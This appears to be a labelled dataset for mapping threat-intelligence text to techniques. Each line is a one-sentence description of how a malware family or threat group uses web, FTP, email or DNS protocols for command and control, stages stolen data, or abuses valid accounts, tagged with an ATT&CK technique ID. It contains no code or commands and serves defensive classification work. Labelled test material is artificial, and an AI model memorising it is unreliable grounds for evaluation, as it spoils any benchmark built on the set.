{"text1":"PLEAD has used HTTP for communications with command and control (C2) servers.","labels":"['T1071.001']"}
{"text1":"POWRUNER can use HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.","labels":"['T1071.001']"}
{"text1":"Pandora can communicate over HTTP.","labels":"['T1071.001']"}
{"text1":"PcShare has used HTTP for C2 communication.","labels":"['T1071.001']"}
{"text1":"PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.","labels":"['T1071.001']"}
{"text1":"PlugX can be configured to use HTTP for command and control.","labels":"['T1071.001']"}
{"text1":"PoetRAT has used HTTP and HTTPs for C2 communications.","labels":"['T1071.001']"}
{"text1":"PolyglotDuke has has used HTTP GET requests in C2 communications.","labels":"['T1071.001']"}
{"text1":"Pony has sent collected information to the C2 via HTTP POST request.","labels":"['T1071.001']"}
{"text1":"PoshC2 can use protocols like HTTP\/HTTPS for command and control traffic.","labels":"['T1071.001']"}
{"text1":"PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.","labels":"['T1071.001']"}
{"text1":"Proxysvc uses HTTP over SSL to communicate commands with the control server.","labels":"['T1071.001']"}
{"text1":"Psylo uses HTTPS for C2.","labels":"['T1071.001']"}
{"text1":"Pteranodon can use HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Pupy can communicate over HTTP for C2.","labels":"['T1071.001']"}
{"text1":"QUADAGENT uses HTTPS and HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"QakBot has the ability to use HTTP and HTTPS in communication with C2 servers.","labels":"['T1071.001']"}
{"text1":"QuietSieve can use HTTPS in C2 communications.","labels":"['T1071.001']"}
{"text1":"RATANKBA uses HTTP\/HTTPS for command and control communication.","labels":"['T1071.001']"}
{"text1":"RCSession can use HTTP in C2 communications.","labels":"['T1071.001']"}
{"text1":"REvil has used HTTP and HTTPS in communication with C2.","labels":"['T1071.001']"}
{"text1":"ROKRAT can use HTTP and HTTPS for command and control communication.","labels":"['T1071.001']"}
{"text1":"RTM has initiated connections to external domains using HTTPS.","labels":"['T1071.001']"}
{"text1":"RainyDay can use HTTP in C2 communications.","labels":"['T1071.001']"}
{"text1":"Ramsay has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Rancor has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Remexi uses BITSAdmin to communicate with the C2 server over HTTP.","labels":"['T1071.001']"}
{"text1":"Remsec is capable of using HTTP and HTTPS for C2.","labels":"['T1071.001']"}
{"text1":"Rising Sun has used HTTP and HTTPS for command and control.","labels":"['T1071.001']"}
{"text1":"Rocke has executed wget and curl commands to Pastebin over the HTTPS protocol.","labels":"['T1071.001']"}
{"text1":"S-Type uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications.","labels":"['T1071.001']"}
{"text1":"SNUGRIDE communicates with its C2 server over HTTP.","labels":"['T1071.001']"}
{"text1":"SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute.","labels":"['T1071.001']"}
{"text1":"Sakula uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Sandworm Team's BCS-server tool connects to the designated C2 server via HTTP.","labels":"['T1071.001']"}
{"text1":"SeaDuke uses HTTP and HTTPS for C2.","labels":"['T1071.001']"}
{"text1":"ServHelper uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Shamoon has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"ShimRat communicated over HTTP and HTTPS with C2 servers.","labels":"['T1071.001']"}
{"text1":"ShimRatReporter communicated over HTTP with preconfigured C2 servers.","labels":"['T1071.001']"}
{"text1":"Sibot communicated with its C2 server via HTTP GET requests.","labels":"['T1071.001']"}
{"text1":"SideTwist has used HTTP GET and POST requests over port 443 for C2.","labels":"['T1071.001']"}
{"text1":"SilverTerrier uses HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"Sliver has the ability to support C2 communications over HTTP\/S.","labels":"['T1071.001']"}
{"text1":"Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS.","labels":"['T1071.001']"}
{"text1":"Smoke Loader uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Some Reaver variants use HTTP for C2.","labels":"['T1071.001']"}
{"text1":"SoreFang can use HTTP in C2 communications.","labels":"['T1071.001']"}
{"text1":"Spark has used HTTP POST requests to communicate with its C2 server to receive commands.","labels":"['T1071.001']"}
{"text1":"SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server.","labels":"['T1071.001']"}
{"text1":"Squirrelwaffle has used HTTP POST requests for C2 communications.","labels":"['T1071.001']"}
{"text1":"Stealth Falcon malware communicates with its C2 server via HTTPS.","labels":"['T1071.001']"}
{"text1":"StrongPity can use HTTP and HTTPS in C2 communications.","labels":"['T1071.001']"}
{"text1":"Stuxnet uses HTTP to communicate with a command and control server.","labels":"['T1071.001']"}
{"text1":"Sys10 uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"TA551 has used HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"TSCookie can multiple protocols including HTTP and HTTPS in communication with command and control (C2) servers.","labels":"['T1071.001']"}
{"text1":"Taidoor has used HTTP GET and POST requests for C2.","labels":"['T1071.001']"}
{"text1":"The \"Uploader\" variant of HAMMERTOSS visits a hard-coded server over HTTP\/S to download the images HAMMERTOSS uses to receive commands.","labels":"['T1071.001']"}
{"text1":"The Komplex C2 channel uses HTTP POST requests.","labels":"['T1071.001']"}
{"text1":"The Regin malware platform supports many standard protocols, including HTTP and HTTPS.","labels":"['T1071.001']"}
{"text1":"ThiefQuest uploads files via unencrypted HTTP.","labels":"['T1071.001']"}
{"text1":"Threat Group-3390 malware has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"TinyTurla can use HTTPS in C2 communications.","labels":"['T1071.001']"}
{"text1":"Tomiris can use HTTP to establish C2 communications.","labels":"['T1071.001']"}
{"text1":"Torisma can use HTTP and HTTPS for C2 communications.","labels":"['T1071.001']"}
{"text1":"TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.","labels":"['T1071.001']"}
{"text1":"Turian has the ability to use HTTP for its C2.","labels":"['T1071.001']"}
{"text1":"Turla has used HTTP and HTTPS for C2 communications.","labels":"['T1071.001']"}
{"text1":"UBoatRAT has used HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"UNC2452 used HTTP for C2 and data exfiltration.","labels":"['T1071.001']"}
{"text1":"UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers.","labels":"['T1071.001']"}
{"text1":"Ursnif has used HTTPS for C2.","labels":"['T1071.001']"}
{"text1":"VBShower has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.","labels":"['T1071.001']"}
{"text1":"VERMIN uses HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"VaporRage can use HTTP to download shellcode from compromised websites.","labels":"['T1071.001']"}
{"text1":"Various implementations of CHOPSTICK communicate with C2 over HTTP.","labels":"['T1071.001']"}
{"text1":"Vasport creates a backdoor by making a connection using a HTTP POST.","labels":"['T1071.001']"}
{"text1":"WellMess can use HTTP and HTTPS in C2 communications.","labels":"['T1071.001']"}
{"text1":"WinMM uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"WindTail has the ability to use HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"Windshift has used tools that communicate with C2 over HTTP.","labels":"['T1071.001']"}
{"text1":"Winnti for Linux has used HTTP in outbound communications.","labels":"['T1071.001']"}
{"text1":"Winnti for Windows has the ability to use encapsulated HTTP\/S in C2 communications.","labels":"['T1071.001']"}
{"text1":"Wizard Spider has used HTTP for network communications.","labels":"['T1071.001']"}
{"text1":"Xbash uses HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"YAHOYAH uses HTTP for C2.","labels":"['T1071.001']"}
{"text1":"ZLib communicates over HTTP for C2.","labels":"['T1071.001']"}
{"text1":"ZeroT has used HTTP for C2.","labels":"['T1071.001']"}
{"text1":"Zeus Panda uses HTTP for C2 communications.","labels":"['T1071.001']"}
{"text1":"ZxShell has used HTTP for C2 connections.","labels":"['T1071.001']"}
{"text1":"httpclient uses HTTP for command and control.","labels":"['T1071.001']"}
{"text1":"pngdowner uses HTTP for command and control.","labels":"['T1071.001']"}
{"text1":"xCaon has communicated with the C2 server by sending POST requests over HTTP.","labels":"['T1071.001']"}
{"text1":"CARROTBALL has the ability to use FTP in C2 communications.","labels":"['T1071.002']"}
{"text1":"During Operation Honeybee, the threat actors had the ability to use FTP for C2.","labels":"['T1071.002']"}
{"text1":"JPIN can communicate over FTP.","labels":"['T1071.002']"}
{"text1":"Kimsuky has used FTP to download additional malware to the target machine.","labels":"['T1071.002']"}
{"text1":"Machete malware used FTP for C2.","labels":"['T1071.002']"}
{"text1":"Machete uses FTP for Command & Control.","labels":"['T1071.002']"}
{"text1":"NOKKI has used FTP for C2 communications.","labels":"['T1071.002']"}
{"text1":"SYSCON has the ability to use FTP in C2 communications.","labels":"['T1071.002']"}
{"text1":"ShadowPad has used FTP for C2 communications.","labels":"['T1071.002']"}
{"text1":"SilverTerrier uses FTP for C2 communications.","labels":"['T1071.002']"}
{"text1":"XAgentOSX contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.","labels":"['T1071.002']"}
{"text1":"ZxShell has used FTP for C2 connections.","labels":"['T1071.002']"}
{"text1":"A SUGARDUMP variant used SMTP for C2.","labels":"['T1071.003']"}
{"text1":"APT28 has used IMAP, POP3, and SMTP for a communication channel in various implants, including using self-registered Google Mail accounts and later compromised email servers of its victims.","labels":"['T1071.003']"}
{"text1":"APT32 has used email for C2 via an Office macro.","labels":"['T1071.003']"}
{"text1":"Agent Tesla has used SMTP for C2 communications.","labels":"['T1071.003']"}
{"text1":"BadPatch uses SMTP for C2.","labels":"['T1071.003']"}
{"text1":"CORESHELL can communicate over SMTP and POP3 for C2.","labels":"['T1071.003']"}
{"text1":"Cannon uses SMTP\/S and POP3\/S for C2 communications by sending and receiving emails.","labels":"['T1071.003']"}
{"text1":"JPIN can send email over SMTP.","labels":"['T1071.003']"}
{"text1":"LightNeuron uses SMTP for C2.","labels":"['T1071.003']"}
{"text1":"NavRAT uses the email platform, Naver, for C2 communications, leveraging SMTP.","labels":"['T1071.003']"}
{"text1":"OLDBAIT can use SMTP for C2.","labels":"['T1071.003']"}
{"text1":"RDAT can use email attachments for C2 communications.","labels":"['T1071.003']"}
{"text1":"Remsec is capable of using SMTP for C2.","labels":"['T1071.003']"}
{"text1":"SilverTerrier uses SMTP for C2 communications.","labels":"['T1071.003']"}
{"text1":"Turla has used multiple backdoors which communicate with a C2 server via email attachments.","labels":"['T1071.003']"}
{"text1":"Various implementations of CHOPSTICK communicate with C2 over SMTP and POP3.","labels":"['T1071.003']"}
{"text1":"Zebrocy uses SMTP and POP3 for C2.","labels":"['T1071.003']"}
{"text1":"APT18 uses DNS for C2 communications.","labels":"['T1071.004']"}
{"text1":"APT39 has used remote access tools that leverage DNS in communications with C2.","labels":"['T1071.004']"}
{"text1":"APT41 used DNS for C2 communications.","labels":"['T1071.004']"}
{"text1":"BONDUPDATER can use DNS and TXT records within its DNS tunneling protocol for command and control.","labels":"['T1071.004']"}
{"text1":"Chimera has used Cobalt Strike to encapsulate C2 in DNS traffic.","labels":"['T1071.004']"}
{"text1":"Cobalt Group has used DNS tunneling for C2.","labels":"['T1071.004']"}
{"text1":"Cobalt Strike can use a custom command and control protocol that can be encapsulated in DNS. All protocols use their standard assigned ports.","labels":"['T1071.004']"}
{"text1":"Cobalt Strike uses a custom command and control protocol that can encapsulated in DNS. All protocols use their standard assigned ports.","labels":"['T1071.004']"}
{"text1":"Cobian RAT uses DNS for C2.","labels":"['T1071.004']"}
{"text1":"DanBot can use use IPv4 A records and IPv6 AAAA DNS records in C2 communications.","labels":"['T1071.004']"}
{"text1":"Denis has used DNS tunneling for C2 communications.","labels":"['T1071.004']"}
{"text1":"DnsSystem  can direct queries to custom DNS servers and return C2 commands using TXT records.","labels":"['T1071.004']"}
{"text1":"Ebury has used DNS requests over UDP port 53 for C2.","labels":"['T1071.004']"}
{"text1":"Gelsemium has the ability to use DNS in communication with C2.","labels":"['T1071.004']"}
{"text1":"Goopy has the ability to communicate with its C2 over DNS.","labels":"['T1071.004']"}
{"text1":"HTTPBrowser has used DNS for command and control.","labels":"['T1071.004']"}
{"text1":"Helminth can use DNS for C2.","labels":"['T1071.004']"}
{"text1":"Heyoka Backdoor can use DNS tunneling for C2 communications.","labels":"['T1071.004']"}
{"text1":"InvisiMole has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies.","labels":"['T1071.004']"}
{"text1":"Ke3chang malware RoyalDNS has used DNS for C2.","labels":"['T1071.004']"}
{"text1":"LazyScripter has leveraged dynamic DNS providers for C2 communications.","labels":"['T1071.004']"}
{"text1":"Matryoshka uses DNS for C2.","labels":"['T1071.004']"}
{"text1":"Mythic supports DNS-based C2 profiles.","labels":"['T1071.004']"}
{"text1":"NanHaiShu uses DNS for the C2 communications.","labels":"['T1071.004']"}
{"text1":"OilRig has used DNS for C2 including the publicly available \"requestbin.net\" tunneling service.","labels":"['T1071.004']"}
{"text1":"POWRUNER can use DNS for C2 communications.","labels":"['T1071.004']"}
{"text1":"Pisloader uses DNS as its C2 protocol.","labels":"['T1071.004']"}
{"text1":"RDAT has used DNS to communicate with the C2.","labels":"['T1071.004']"}
{"text1":"Remsec is capable of using DNS for C2.","labels":"['T1071.004']"}
{"text1":"SOUNDBITE communicates via DNS for C2.","labels":"['T1071.004']"}
{"text1":"SUNBURST used DNS for C2 traffic designed to mimic normal SolarWinds API communications.","labels":"['T1071.004']"}
{"text1":"ShadowPad has used DNS tunneling for C2 communications.","labels":"['T1071.004']"}
{"text1":"Shark can use DNS in C2 communications.","labels":"['T1071.004']"}
{"text1":"Sliver can support C2 communications over DNS.","labels":"['T1071.004']"}
{"text1":"SombRAT can communicate over DNS with the C2 server.","labels":"['T1071.004']"}
{"text1":"TEXTMATE uses DNS TXT records for C2.","labels":"['T1071.004']"}
{"text1":"Variants of Kevin can communicate over DNS through queries to the server for constructed domain names with embedded information.","labels":"['T1071.004']"}
{"text1":"APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task.","labels":"['T1072']"}
{"text1":"Threat Group-1314 actors used a victim's endpoint management platform, Altiris, for lateral movement.","labels":"['T1072']"}
{"text1":"Kevin can create directories to store logs and other collected data.","labels":"['T1074']"}
{"text1":"Kobalos can write captured SSH connection credentials to a file under the \"\/var\/run\" directory with a \".pid\" extension for exfiltration.","labels":"['T1074']"}
{"text1":"Shark has stored information in folders named `U1` and `U2` prior to exfiltration.","labels":"['T1074']"}
{"text1":"stages collected data in a text file.","labels":"['T1074', 'T1074']"}
{"text1":"ADVSTORESHELL stores output from command execution in a .dat file in the %TEMP% directory.","labels":"['T1074.001']"}
{"text1":"APT28 has stored captured credential information in a file named pi.log.","labels":"['T1074.001']"}
{"text1":"APT39 has utilized tools to aggregate data prior to exfiltration.","labels":"['T1074.001']"}
{"text1":"AppleSeed can stage files in a central location prior to exfiltration.","labels":"['T1074.001']"}
{"text1":"Astaroth collects data in a plaintext file named r1.log before exfiltration.","labels":"['T1074.001']"}
{"text1":"Attor has staged collected data in a central upload directory prior to exfiltration.","labels":"['T1074.001']"}
{"text1":"AuTo Stealer can store collected data from an infected host to a file named `Hostname_UserName.txt` prior to exfiltration.","labels":"['T1074.001']"}
{"text1":"BADNEWS copies documents under 15MB found on the victim system to is the user's \"%temp%\\SMB\\\" folder. It also copies files from USB devices to a predefined directory.","labels":"['T1074.001']"}
{"text1":"BackdoorDiplomacy has copied files of interest to the main drive's recycle bin.","labels":"['T1074.001']"}
{"text1":"BadPatch stores collected data in log files before exfiltration.","labels":"['T1074.001']"}
{"text1":"BoxCaon has created a working folder for collected files that it sends to the C2 server.","labels":"['T1074.001']"}
{"text1":"Calisto uses a hidden directory named .calisto to store data from the victim\u2019s machine before exfiltration.","labels":"['T1074.001', 'T1564.001']"}
{"text1":"Carbon creates a base directory that contains the files and folders that are collected.","labels":"['T1074.001']"}
{"text1":"Chimera has staged stolen data locally on compromised hosts.","labels":"['T1074.001']"}
{"text1":"Data captured by RawPOS is placed in a temporary file under a directory named \"memdump\".","labels":"['T1074.001']"}
{"text1":"Dragonfly 2.0 created a directory named \"out\" in the user's %AppData% folder and copied files to it.","labels":"['T1074.001']"}
{"text1":"Dragonfly has created a directory named \"out\" in the user's %AppData% folder and copied files to it.","labels":"['T1074.001']"}
{"text1":"During Operation Honeybee, stolen data was copied into a text file using the format `From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt` prior to compression, encoding, and exfiltration.","labels":"['T1074.001']"}
{"text1":"During Operation Wocao, threat actors staged archived files in a temporary directory prior to exfiltration.","labels":"['T1074.001']"}
{"text1":"DustySky created folders in temp directories to host collected files before exfiltration.","labels":"['T1074.001']"}
{"text1":"Dyre has the ability to create files in a TEMP folder to act as a database to store information.","labels":"['T1074.001']"}
{"text1":"Elise creates a file in \"AppData\\Local\\Microsoft\\Windows\\Explorer\" and stores all harvested data in that file.","labels":"['T1074.001']"}
{"text1":"Exaramel for Windows specifies a path to store files scheduled for exfiltration.","labels":"['T1074.001']"}
{"text1":"FLASHFLOOD stages data it copies from the local system or removable drives in the \"%WINDIR%\\$NtUninstallKB885884$\\\" directory.","labels":"['T1074.001']"}
{"text1":"FrameworkPOS can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\\Windows\\.","labels":"['T1074.001']"}
{"text1":"FunnyDream can stage collected information including screen captures and logged keystrokes locally.","labels":"['T1074.001']"}
{"text1":"GALLIUM compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration.","labels":"['T1074.001']"}
{"text1":"Gold Dragon stores information gathered from the endpoint in a file named 1.hwp.","labels":"['T1074.001']"}
{"text1":"Helminth creates folders to store output from batch scripts prior to sending the information to its C2 server.","labels":"['T1074.001']"}
{"text1":"Honeybee adds collected files to a temp.zip file saved in the %temp% folder, then base64 encodes it and uploads it to control server.","labels":"['T1074.001', 'T1560']"}
{"text1":"Indrik Spider has stored collected date in a .tmp file.","labels":"['T1074.001']"}
{"text1":"InvisiMole determines a working directory where it stores all the gathered data about the compromised machine.","labels":"['T1074.001']"}
{"text1":"Kazuar stages command output and collected data in files before exfiltration.","labels":"['T1074.001']"}
{"text1":"Kimsuky has staged collected data files under \"C:\\Program Files\\Common Files\\System\\Ole DB\\\".","labels":"['T1074.001']"}
{"text1":"Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.","labels":"['T1074.001']"}
{"text1":"Leviathan has used C:\\Windows\\Debug and C:\\Perflogs as staging directories.","labels":"['T1074.001']"}
{"text1":"LightNeuron can store email data in files and directories specified in its configuration, such as \"C:\\Windows\\ServiceProfiles\\NetworkService\\appdata\\Local\\Temp\\\".","labels":"['T1074.001']"}
{"text1":"MESSAGETAP stored targeted SMS messages that matched its target list in CSV files on the compromised system.","labels":"['T1074.001']"}
{"text1":"Machete created their own directories to drop files into.","labels":"['T1074.001']"}
{"text1":"Machete stores files and logs in a folder on the local drive.","labels":"['T1074.001']"}
{"text1":"Mis-Type has temporarily stored collected information to the files `\u201c%AppData%\\{Unique Identifier}\\HOSTRURKLSR\u201d` and `\u201c%AppData%\\{Unique Identifier}\\NEWERSSEMP\u201d`.","labels":"['T1074.001']"}
{"text1":"MoonWind saves information from its keylogging routine as a .zip file in the present working directory.","labels":"['T1074.001']"}
{"text1":"NETWIRE has the ability to write collected data to a file created in the \".\/LOGS\" directory.","labels":"['T1074.001']"}
{"text1":"NOKKI can collect data from the victim and stage it in \"LOCALAPPDATA%\\MicroSoft Updatea\\uplog.tmp\".","labels":"['T1074.001']"}
{"text1":"ObliqueRAT can copy specific files, webcam captures, and screenshots to local directories.","labels":"['T1074.001']"}
{"text1":"Octopus has stored collected information in the Application Data directory on a compromised host.","labels":"['T1074.001']"}
{"text1":"OopsIE stages the output from command execution and collected files in specific folders before exfiltration.","labels":"['T1074.001']"}
{"text1":"Operation Wocao has staged archived files in a temporary directory prior to exfiltration.","labels":"['T1074.001']"}
{"text1":"PUNCHTRACK aggregates collected data in a tmp file.","labels":"['T1074.001']"}
{"text1":"Patchwork copied all targeted files to a directory called index that was eventually uploaded to the C&C server.","labels":"['T1074.001']"}
{"text1":"PoisonIvy stages collected data in a text file.","labels":"['T1074.001']"}
{"text1":"PowerLess can stage stolen browser data in `C:\\\\Windows\\\\Temp\\\\cup.tmp` and keylogger data in `C:\\\\Windows\\\\Temp\\\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`.","labels":"['T1074.001']"}
{"text1":"Prikormka creates a directory, \"%USERPROFILE%\\AppData\\Local\\SKC\\\", which is used to store collected log files.","labels":"['T1074.001']"}
{"text1":"Rover copies files from removable drives to \"C:\\system\".","labels":"['T1074.001']"}
{"text1":"SPACESHIP identifies files with certain extensions and copies them to a directory in the user's profile.","labels":"['T1074.001']"}
{"text1":"STARWHALE has stored collected data in a file called `stari.txt`.","labels":"['T1074.001']"}
{"text1":"SUGARDUMP has stored collected data under `%<malware_execution_folder>%\\\\CrashLog.txt`.","labels":"['T1074.001']"}
{"text1":"Sidewinder has collected stolen files in a temporary folder in preparation for exfiltration.","labels":"['T1074.001']"}
{"text1":"SombRAT can store harvested data in a custom database under the %TEMP% directory.","labels":"['T1074.001']"}
{"text1":"TeamTNT has aggregated collected credentials in text files before exfiltrating.","labels":"['T1074.001']"}
{"text1":"Threat Group-3390 has locally staged encrypted archives for later exfiltration efforts.","labels":"['T1074.001']"}
{"text1":"Turian can store copied files in a specific directory prior to exfiltration.","labels":"['T1074.001']"}
{"text1":"USBStealer collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.","labels":"['T1074.001']"}
{"text1":"Ursnif has used tmp files to stage gathered information.","labels":"['T1074.001']"}
{"text1":"Zebrocy stores all collected information in a single file before exfiltration.","labels":"['T1074.001']"}
{"text1":"ccf32 can temporarily store files in a hidden directory on the local host.","labels":"['T1074.001']"}
{"text1":"APT28 has staged archives of collected data on a target's Outlook Web Access (OWA) server.","labels":"['T1074.002']"}
{"text1":"Chimera has staged stolen data on designated servers in the target environment.","labels":"['T1074.002']"}
{"text1":"During Night Dragon, threat actors copied files to company web servers and subsequently downloaded them.","labels":"['T1074.002']"}
{"text1":"FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.","labels":"['T1074.002']"}
{"text1":"FIN8 aggregates staged data from a network into a single location.","labels":"['T1074.002']"}
{"text1":"Leviathan has staged data remotely prior to exfiltration.","labels":"['T1074.002']"}
{"text1":"Threat Group-3390 has moved staged encrypted archives to Internet-facing servers that had previously been compromised with China Chopper prior to exfiltration.","labels":"['T1074.002']"}
{"text1":"UNC2452 staged data and files in password-protected archives on a victim's OWA server.","labels":"['T1074.002']"}
{"text1":"menuPass has staged data on remote MSP systems or other victim networks prior to exfiltration.","labels":"['T1074.002']"}
{"text1":"APT18 actors leverage legitimate credentials to log into external remote services.","labels":"['T1078', 'T1133']"}
{"text1":"APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder.","labels":"['T1078']"}
{"text1":"APT29 used different compromised credentials for remote access and to move laterally.","labels":"['T1078']"}
{"text1":"APT34 has used valid administrator credentials to assist in lateral movement.","labels":"['T1078']"}
{"text1":"Carbanak actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars.","labels":"['T1078']"}
{"text1":"Chimera has used a valid account to maintain persistence via scheduled task.","labels":"['T1078']"}
{"text1":"Dragonfly 2.0 compromised user credentials and used valid accounts for operations.","labels":"['T1078']"}
{"text1":"Dtrack used hard-coded credentials to gain access to a network share.","labels":"['T1078']"}
{"text1":"During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems.","labels":"['T1078', 'T1133']"}
{"text1":"FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor.","labels":"['T1078']"}
{"text1":"FIN4 has used legitimate credentials to hijack email communications.","labels":"['T1078']"}
{"text1":"FIN5 has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.","labels":"['T1078']"}
{"text1":"FIN7 has harvested valid administrative credentials for lateral movement.","labels":"['T1078']"}
{"text1":"Fox Kitten has used valid credentials with various services during lateral movement.","labels":"['T1078']"}
{"text1":"GALLIUM leveraged valid accounts to maintain access to a victim network.","labels":"['T1078']"}
{"text1":"Industroyer can use supplied user credentials to execute processes and stop services.","labels":"['T1078']"}
{"text1":"Ke3chang has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts.","labels":"['T1078']"}
{"text1":"Kinsing has used valid SSH credentials to access remote hosts.","labels":"['T1078']"}
{"text1":"Leviathan has obtained valid accounts to gain initial access.","labels":"['T1078']"}
{"text1":"Leviathan has used valid, compromised email accounts for defense evasion, including to send malicious emails to other victim organizations.","labels":"['T1078']"}
{"text1":"Night Dragon has used compromised VPN accounts to gain access to victim systems.","labels":"['T1078', 'T1133']"}
{"text1":"OilRig has used compromised credentials to access other systems on a victim network.","labels":"['T1078']"}
{"text1":"Operation Wocao has used valid VPN credentials to gain initial access.","labels":"['T1078']"}
{"text1":"POLONIUM has used valid compromised credentials to gain access to victim environments.","labels":"['T1078']"}
{"text1":"PittyTiger attempts to obtain legitimate credentials during operations.","labels":"['T1078']"}
{"text1":"Sandworm Team have used previously acquired legitimate credentials prior to attacks.","labels":"['T1078']"}
{"text1":"Silence has used compromised credentials to log on to other systems and escalate privileges.","labels":"['T1078']"}
{"text1":"Silent Librarian has used compromised credentials to obtain unauthorized access to online accounts.","labels":"['T1078']"}
{"text1":"Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials.","labels":"['T1078', 'T1114.002']"}
{"text1":"Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner.","labels":"['T1078']"}
{"text1":"TEMP.Veles has used compromised VPN accounts.","labels":"['T1078']"}
{"text1":"Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks.","labels":"['T1078']"}
{"text1":"To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.","labels":"['T1078']"}
{"text1":"UNC2452 used different compromised credentials for remote access and to move laterally.","labels":"['T1078']"}
{"text1":"Wizard Spider has used valid credentials for privileged accounts with the goal of accessing domain controllers.","labels":"['T1078']"}
{"text1":"menuPass has used valid accounts including shared between Managed Service Providers and clients to move between the two environments.","labels":"['T1078']"}
{"text1":"HyperStack can use default credentials to connect to IPC$ shares on remote machines.","labels":"['T1078.001']"}
{"text1":"Stuxnet infected WinCC machines via a hardcoded database server password.","labels":"['T1078.001']"}
{"text1":"APT29 has used valid accounts, including administrator accounts, to help facilitate lateral movement on compromised networks.","labels":"['T1078.002']"}
{"text1":"Chimera has used compromised domain accounts to gain access to the target environment.","labels":"['T1078.002']"}
{"text1":"Cobalt Strike can use known credentials to run commands and spawn processes as a domain user account.","labels":"['T1078.002']"}
{"text1":"CreepySnail can use stolen credentials to authenticate on target networks.","labels":"['T1078.002']"}
{"text1":"During Night Dragon, threat actors used domain accounts to gain further access to victim systems.","labels":"['T1078.002']"}
{"text1":"During Operation CuckooBees, the threat actors used compromised domain administrator credentials as part of their lateral movement.","labels":"['T1078.002']"}
{"text1":"If Shamoon cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.","labels":"['T1078.002']"}
{"text1":"Indrik Spider has collected credentials from infected systems, including domain accounts.","labels":"['T1078.002']"}
{"text1":"Naikon has used administrator credentials for lateral movement in compromised networks.","labels":"['T1078.002']"}
{"text1":"Operation Wocao has used domain credentials, including domain admin, for lateral movement and privilege escalation.","labels":"['T1078.002']"}
{"text1":"Sandworm Team has used stolen credentials to access administrative accounts within the domain.","labels":"['T1078.002']"}
{"text1":"Stuxnet attempts to access network resources with a domain account\u2019s credentials.","labels":"['T1078.002']"}
{"text1":"Threat Group-1314 actors used compromised domain credentials for the victim's endpoint management platform, Altiris, to move laterally.","labels":"['T1078.002']"}
{"text1":"Wizard Spider has used administrative accounts, including Domain Admin, to move laterally within a victim network.","labels":"['T1078.002']"}
{"text1":"APT29 has used compromised local accounts to access victims' networks.","labels":"['T1078.003']"}
{"text1":"APT32 has used legitimate local admin account credentials.","labels":"['T1078.003']"}
{"text1":"Cobalt Strike can use known credentials to run commands and spawn processes as a local user account.","labels":"['T1078.003']"}
{"text1":"Emotet can brute force a local admin password, then use it to facilitate lateral movement.","labels":"['T1078.003']"}
{"text1":"FIN10 has moved laterally using the Local Administrator account.","labels":"['T1078.003']"}
{"text1":"Kimsuky has used a tool called GREASE to add a Windows admin account in order to allow them continued access via RDP.","labels":"['T1078.003']"}
{"text1":"NotPetya can use valid credentials with PsExec or \"wmic\" to spread itself to remote systems.","labels":"['T1078.003']"}
{"text1":"PROMETHIUM has created admin accounts on a compromised host.","labels":"['T1078.003']"}
{"text1":"Stolen Pencil has a tool to add a Windows admin account in order to allow them to ensure continued access via RDP.","labels":"['T1078.003']"}
{"text1":"Tropic Trooper has used known administrator account credentials to execute the backdoor directly.","labels":"['T1078.003']"}
{"text1":"APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.","labels":"['T1078.004']"}
{"text1":"APT33 has used compromised Office 365 accounts in tandem with Ruler in an attempt to gain control of endpoints.","labels":"['T1078.004']"}
